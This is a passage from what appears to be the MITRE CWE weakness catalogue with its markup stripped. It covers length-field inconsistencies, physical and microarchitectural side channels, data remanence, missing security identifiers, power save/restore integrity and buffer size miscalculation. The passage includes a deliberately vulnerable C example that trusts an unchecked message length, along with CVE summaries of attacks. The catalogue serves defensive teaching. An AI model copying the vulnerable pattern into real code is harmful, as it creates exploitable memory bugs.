lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data. + If an attacker can manipulate the length parameter associated with an input such that it is inconsistent with the actual length of the input, this can be leveraged to cause the target application to behave in unexpected, and possibly, malicious ways. One of the possible motives for doing so is to pass in arbitrarily large input to the application. Another possible motivation is the modification of application state by including invalid data for subsequent properties of the application. Such weaknesses commonly lead to attacks such as buffer overflows and execution of arbitrary code. + + + + + + + + + Primary + + + + + + + + + + length manipulation + + + length tampering + + + + + Implementation + + + + + Confidentiality + Integrity + Read Memory + Modify Memory + Varies by Context + + + + + Implementation + When processing structured incoming data containing a size field followed by raw data, ensure that you identify and resolve any inconsistencies between the size field and the actual size of the data. + + + Implementation + Do not let the user control the size of the buffer. + + + Implementation + Validate that the length of the user-supplied data is consistent with the buffer size. + + + + + In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. + + int processMessageFromSocket(int socket) { + int success; + char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; + + // get message from socket and store into buffer + + + //Ignoring possibliity that buffer > BUFFER_SIZE + if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { + + + // place contents of the buffer into message structure + ExMessage *msg = recastBuffer(buffer); + + // copy message body into string for processing + int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; + + // process message + success = processMessage(message); + }return success; + } + + However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). + + + + + CVE-2014-0160 + Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. + https://www.cve.org/CVERecord?id=CVE-2014-0160 + + + CVE-2009-2299 + Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data. + https://www.cve.org/CVERecord?id=CVE-2009-2299 + + + CVE-2001-0825 + Buffer overflow in internal string handling routine allows remote attackers to execute arbitrary commands via a length argument of zero or less, which disables the length check. + https://www.cve.org/CVERecord?id=CVE-2001-0825 + + + CVE-2001-1186 + Web server allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents server from timing out the connection. + https://www.cve.org/CVERecord?id=CVE-2001-1186 + + + CVE-2001-0191 + Service does not properly check the specified length of a cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length. + https://www.cve.org/CVERecord?id=CVE-2001-0191 + + + CVE-2003-0429 + Traffic analyzer allows remote attackers to cause a denial of service and possibly execute arbitrary code via invalid IPv4 or IPv6 prefix lengths, possibly triggering a buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2003-0429 + + + CVE-2000-0655 + Chat client allows remote attackers to cause a denial of service or execute arbitrary commands via a JPEG image containing a comment with an illegal field length of 1. + https://www.cve.org/CVERecord?id=CVE-2000-0655 + + + CVE-2004-0492 + Server allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length HTTP header field causing a heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2004-0492 + + + CVE-2004-0201 + Help program allows remote attackers to execute arbitrary commands via a heap-based buffer overflow caused by a .CHM file with a large length field + https://www.cve.org/CVERecord?id=CVE-2004-0201 + + + CVE-2003-0825 + Name services does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. Can overlap zero-length issues + https://www.cve.org/CVERecord?id=CVE-2003-0825 + + + CVE-2004-0095 + Policy manager allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value. + https://www.cve.org/CVERecord?id=CVE-2004-0095 + + + CVE-2004-0826 + Heap-based buffer overflow in library allows remote attackers to execute arbitrary code via a modified record length field in an SSLv2 client hello message. + https://www.cve.org/CVERecord?id=CVE-2004-0826 + + + CVE-2004-0808 + When domain logons are enabled, server allows remote attackers to cause a denial of service via a SAM_UAS_CHANGE request with a length value that is larger than the number of structures that are provided. + https://www.cve.org/CVERecord?id=CVE-2004-0808 + + + CVE-2002-1357 + Multiple SSH2 servers and clients do not properly handle packets or data elements with incorrect length specifiers, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2002-1357 + + + CVE-2004-0774 + Server allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1. + https://www.cve.org/CVERecord?id=CVE-2004-0774 + + + CVE-2004-0989 + Multiple buffer overflows in xml library that may allow remote attackers to execute arbitrary code via long URLs. + https://www.cve.org/CVERecord?id=CVE-2004-0989 + + + CVE-2004-0568 + Application does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2004-0568 + + + CVE-2003-0327 + Server allows remote attackers to cause a denial of service via a remote password array with an invalid length, which triggers a heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2003-0327 + + + CVE-2003-0345 + Product allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. + https://www.cve.org/CVERecord?id=CVE-2003-0345 + + + CVE-2004-0430 + Server allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field. + https://www.cve.org/CVERecord?id=CVE-2004-0430 + + + CVE-2005-0064 + PDF viewer allows remote attackers to execute arbitrary code via a PDF file with a large /Encrypt /Length keyLength value. + https://www.cve.org/CVERecord?id=CVE-2005-0064 + + + CVE-2004-0413 + SVN client trusts the length field of SVN protocol URL strings, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via an integer overflow that leads to a heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2004-0413 + + + CVE-2004-0940 + Is effectively an accidental double increment of a counter that prevents a length check conditional from exiting a loop. + https://www.cve.org/CVERecord?id=CVE-2004-0940 + + + CVE-2002-1235 + Length field of a request not verified. + https://www.cve.org/CVERecord?id=CVE-2002-1235 + + + CVE-2005-3184 + Buffer overflow by modifying a length value. + https://www.cve.org/CVERecord?id=CVE-2005-3184 + + + SECUNIA:18747 + Length field inconsistency crashes cell phone. + http://secunia.com/advisories/18747/ + + + + + Length Parameter Inconsistency + + + SFP24 + Tainted Input to Command + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This probably overlaps other categories including zero-length issues. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-12-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Type + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Length Parameter Inconsistency + Failure to Handle Length Parameter Inconsistency + + + + + The device does not contain sufficient protection + mechanisms to prevent physical side channels from exposing + sensitive information due to patterns in physically observable + phenomena such as variations in power consumption, + electromagnetic emissions (EME), or acoustic emissions. + + + An adversary could monitor and measure physical + phenomena to detect patterns and make inferences, even if it + is not possible to extract the information in the digital + domain. + Physical side channels have been well-studied for + decades in the context of breaking implementations of + cryptographic algorithms or other attacks against security + features. These side channels may be easily observed by an + adversary with physical access to the device, or using a + tool that is in close proximity. If the adversary can + monitor hardware operation and correlate its data processing + with power, EME, and acoustic measurements, the adversary + might be able to recover of secret keys and data. + + + + + + + + Primary + + + Resultant + + + + + + + + + + + Implementation + + + + + Confidentiality + Read Memory + Read Application Data + + + + + Manual Analysis + Perform a set of leakage detection tests such as the procedure outlined in the Test Vector Leakage Assessment (TVLA) test requirements for AES [REF-1230]. TVLA is the basis for the ISO standard 17825 [REF-1229]. A separate methodology is provided by [REF-1228]. Note that sole reliance on this method might not yield expected results [REF-1239] [REF-1240]. + Moderate + + + Manual Analysis + + Post-silicon, perform full side-channel attacks (penetration testing) covering as many known leakage models as possible against test code. + Moderate + + + Manual Analysis + + Pre-silicon - while the aforementioned TVLA methods can be performed post-silicon, models of device power consumption or other physical emanations can be built from information present at various stages of the hardware design process before fabrication. TVLA or known side-channel attacks can be applied to these simulated traces and countermeasures applied before tape-out. Academic research in this field includes [REF-1231] [REF-1232] [REF-1233]. + Moderate + + + + + Architecture and Design + Apply blinding or masking techniques to implementations of cryptographic algorithms. + + + Implementation + Add shielding or tamper-resistant protections to the device to increase the difficulty of obtaining measurements of the side-channel. + + + + + Consider a device that checks a + passcode to unlock the screen. + As each character of + the PIN number is entered, a correct character + exhibits one current pulse shape while an + incorrect character exhibits a different current + pulse shape. + PIN numbers used to unlock a cell phone + should not exhibit any characteristics about + themselves. This creates a side channel. An + attacker could monitor the pulses using an + oscilloscope or other method. Once the first + character is correctly guessed (based on the + oscilloscope readings), they can then move to the + next character, which is much more efficient than + the brute force method of guessing every possible + sequence of characters. + Rather than comparing + each character to the correct PIN value as it is + entered, the device could accumulate the PIN in a + register, and do the comparison all at once at the + end. Alternatively, the components for the + comparison could be modified so that the current + pulse shape is the same regardless of the + correctness of the entered + character. + + + Consider the device vulnerability CVE-2021-3011, which affects certain microcontrollers [REF-1221]. The Google Titan Security Key is used for two-factor authentication using cryptographic algorithms. The device uses an internal secret key for this purpose and exchanges information based on this key for the authentication. If this internal secret key and the encryption algorithm were known to an adversary, the key function could be duplicated, allowing the adversary to masquerade as the legitimate user. + The local method of extracting the secret key consists of plugging the key into a USB port and using electromagnetic (EM) sniffing tools and computers. + Several solutions could have been considered by the manufacturer. For example, the manufacturer could shield the circuitry in the key or add randomized delays, indirect calculations with random values involved, or randomly ordered calculations to make extraction much more difficult or a combination of these techniques. + + + + + CVE-2021-3011 + electromagnetic-wave side-channel in security-related microcontrollers allows extraction of private key + https://www.cve.org/CVERecord?id=CVE-2021-3011 + + + CVE-2013-4576 + message encryption software uses certain instruction sequences that allows RSA key extraction using a chosen-ciphertext attack and acoustic cryptanalysis + https://www.cve.org/CVERecord?id=CVE-2013-4576 + + + CVE-2020-28368 + virtualization product allows recovery of AES keys from the guest OS using a side channel attack against a power/energy monitoring interface. + https://www.cve.org/CVERecord?id=CVE-2020-28368 + + + CVE-2019-18673 + power consumption varies based on number of pixels being illuminated in a display, allowing reading of secrets such as the PIN by using the USB interface to measure power consumption + https://www.cve.org/CVERecord?id=CVE-2019-18673 + + + + Power + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Nicole Fern + Tortuga Logic + 2020-05-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Functional_Areas, Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Anders Nordstrom, Alric Althoff + Tortuga Logic + 2021-10-11 + Provided detection methods, observed examples, and references + + + Nicole Fern + Riscure + 2021-10-13 + Provided detection methods, observed examples, and references + + Improper Protection Against Physical Side Channels + + + + The product's data removal process does not completely delete all data and potentially sensitive information within hardware components. + + Physical properties of hardware devices, such as remanence of magnetic media, residual charge of ROMs/RAMs, or screen burn-in may still retain sensitive data after a data removal process has taken place and power is removed. + Recovering data after erasure or overwriting is possible due to a phenomenon called data remanence. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree such that even after the original data is erased that data can still be recovered through physical characterization of the memory cells. + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Read Memory + Read Application Data + + + + + Architecture and Design + Apply blinding or masking techniques to implementations of cryptographic algorithms. + + + Implementation + Alter the method of erasure, add protection of media, or destroy the media to protect the data. + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + Nicole Fern + Tortuga Logic + 2020-05-29 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier. + + In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier. This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions. + A common weakness that can exist in such transaction schemes is that the source agent fails to include the necessary, security identifier with the transaction. Because of the missing security identifier, the destination agent might drop the message, thus resulting in Denial-of-Service (DoS), or get confused in its attempt to execute the given action, which confusion could result in privilege escalation or a gain of unintended access. + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Crash, Exit, or Restart + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + High + + + + + Architecture and Design + Transaction details must be reviewed for design inconsistency and common weaknesses. + + + Implementation + Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing. + + + + + + Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. + The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., "1") allows for a respective action from an agent whose identity matches the number of the bit; if set to "0" (i.e., Clear), it disallows the respective action to that corresponding agent. + + + + + Register + Field description + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_4 + AES key [96:127] for encryption or decryption, Default 0x00000000 + + + AES_KEY_ACCESS_POLICY + [31:0] Default 0x00000004 - agent with Security Identifier "2" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers + + + + The originator sends a transaction with no security identifier, i.e., meaning the value is "0" or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier. + + + + Register + Field description + + + AES_ENC_DEC_KEY_0 + AES key [0:31] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_1 + AES key [32:63] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_2 + AES key [64:95] for encryption or decryption, Default 0x00000000 + + + AES_ENC_DEC_KEY_4 + AES key [96:127] for encryption or decryption, Default 0x00000000 + + + AES_KEY_ACCESS_POLICY + [31:0] Default 0x00000002 - agent with security identifier "2" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers + + + + The originator should send a transaction with Security Identifier "2" which will allow access to the AES-Key-access register and allow encryption and decryption operations. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-02-14 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts. + + Modern processors use techniques such as out-of-order execution, speculation, prefetching, data forwarding, and caching to increase performance. Details about the implementation of these techniques are hidden from the programmer's view. This is problematic when the hardware implementation of these techniques results in resources being shared across supposedly isolated contexts. Contention for shared resources between different contexts opens covert channels that allow malicious programs executing in one context to recover information from another context. + + Some examples of shared micro-architectural resources that have been used to leak information between contexts are caches, branch prediction logic, and load or store buffers. Speculative and out-of-order execution provides an attacker with increased control over which data is leaked through the covert channel. + + If the extent of resource sharing between contexts in the design microarchitecture is undocumented, it is extremely difficult to ensure system assets are protected against disclosure. + + + + + + + + + + + + + + Architecture and Design + Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. + + + Implementation + Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. + + + + + Confidentiality + Read Application Data + Read Memory + Microarchitectural side-channels have been used to leak specific information such as cryptographic keys, and Address Space Layout Randomization (ALSR) offsets as well as arbitrary memory. + + + + + Architecture and Design + Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers. + + + Requirements + Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers. + + + + + On some processors the hardware indirect branch predictor is shared between execution contexts, for example, between sibling SMT threads. When SMT thread A executes an indirect branch to a target address X, this target may be temporarily stored by the indirect branch predictor. A subsequent indirect branch mis-prediction for SMT thread B could speculatively execute instructions at X (or at a location in B's address space that partially aliases X). Even though the processor rolls back the architectural effects of the mis-predicted indirect branch, the memory accesses alter data cache state, which is not rolled back after the indirect branch is resolved. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.9, members of the CWE Hardware SIG are closely analyzing this entry and others to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks. Additional investigation may include other weaknesses related to microarchitectural state. Finally, this entry's demonstrative example might not be appropriate. As a result, this entry might change significantly in CWE 4.10. + + + + Nicole Fern + Tortuga Logic + 2020-05-08 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product performs a power save/restore + operation, but it does not ensure that the integrity of + the configuration state is maintained and/or verified between + the beginning and ending of the operation. + + Before powering down, the Intellectual + Property (IP) saves current state (S) to persistent + storage such as flash or always-on memory in order to + optimize the restore operation. During this process, + an attacker with access to the persistent storage may + alter (S) to a configuration that could potentially + modify privileges, disable protections, and/or cause + damage to the hardware. If the IP does not validate + the configuration state stored in persistent memory, + upon regaining power or becoming operational again, + the IP could be compromised through the activation of + an unwanted/harmful configuration. + + + + + + + + + + + + + + + + Architecture and Design + Weakness introduced via missing internal integrity guarantees during power save/restore + + + Integration + Weakness introduced via missing external integrity verification during power save/restore + + + + + Confidentiality + Integrity + DoS: Instability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (Other) + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Alter Execution Logic + Quality Degradation + Unexpected State + Reduce Maintainability + Reduce Performance + Reduce Reliability + High + + + + + Architecture and Design + Inside the IP, incorporate integrity checking + on the configuration state via a cryptographic + hash. The hash can be protected inside the IP such as + by storing it in internal registers which never lose + power. Before powering down, the IP performs a hash of + the configuration and saves it in these persistent + registers. Upon restore, the IP performs a hash of the + saved configuration and compares it with the + saved hash. If they do not match, then the IP should + not trust the configuration. + + + Integration + Outside the IP, incorporate integrity checking + of the configuration state via a trusted agent. Before + powering down, the trusted agent performs a hash of the + configuration and saves the hash in persistent storage. + Upon restore, the IP requests the trusted agent + validate its current configuration. If the + configuration hash is invalid, then the IP should not + trust the configuration. + + + + Integration + Outside the IP, incorporate a protected + environment that prevents undetected modification of + the configuration state by untrusted agents. Before + powering down, a trusted agent saves the IP's + configuration state in this protected location that + only it is privileged to. Upon restore, the trusted + agent loads the saved state into the IP. + + + + + + The following pseudo code demonstrates the + power save/restore workflow which may lead to weakness + through a lack of validation of the config state after + restore. + + + void save_config_state() + { + + void* cfg; + + cfg = get_config_state(); + save_config_state(cfg); + + go_to_sleep(); + + } + + void restore_config_state() + { + + void* cfg; + cfg = get_config_file(); + load_config_file(cfg); + + } + + The following pseudo-code is the proper workflow for the integrity checking mitigation: + + void save_config_state() + { + + void* cfg; + void* sha; + + cfg = get_config_state(); + save_config_state(cfg); + + // save hash(cfg) to trusted location + sha = get_hash_of_config_state(cfg); + save_hash(sha); + + go_to_sleep(); + + } + + void restore_config_state() + { + + void* cfg; + void* sha_1, sha_2; + + cfg = get_config_file(); + // restore hash of config from trusted memory + sha_1 = get_persisted_sha_value(); + + sha_2 = get_hash_of_config_state(cfg); + if (sha_1 != sha_2) + + assert_error_and_halt(); + + + load_config_file(cfg); + + } + + It must be noted that in the previous example of + good pseudo code, the memory (where the hash of the + config state is stored) must be trustworthy while the + hardware is between the power save and restore states. + + + + + Power + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Accellera Systems Initiative + 2020-07-16 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-03-15 + updated Functional_Areas + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow. + + + + + + + + + + + + + + Implementation + + + High + + + Integrity + Availability + Confidentiality + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + Read Memory + Modify Memory + If the incorrect calculation is used in the context of memory allocation, then the software may create a buffer that is smaller or larger than expected. If the allocated buffer is smaller than expected, this could lead to an out-of-bounds read or write (CWE-119), possibly causing a crash, allowing arbitrary code execution, or exposing sensitive data. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting potential errors in buffer calculations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + Detection techniques for buffer-related errors are more mature than for most other weakness types. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem. + + + Manual Analysis + Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. + + High + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + Cost effective for partial coverage: + + Source Code Quality Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + When allocating a buffer for the purpose of transforming, converting, or encoding an input, allocate enough memory to handle the largest possible encoding. For example, in a routine that converts "&" characters to "&amp;" for HTML entity encoding, the output buffer needs to be at least 5 times as large as the input buffer. + + + Implementation + + Understand the programming language's underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7] + Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect 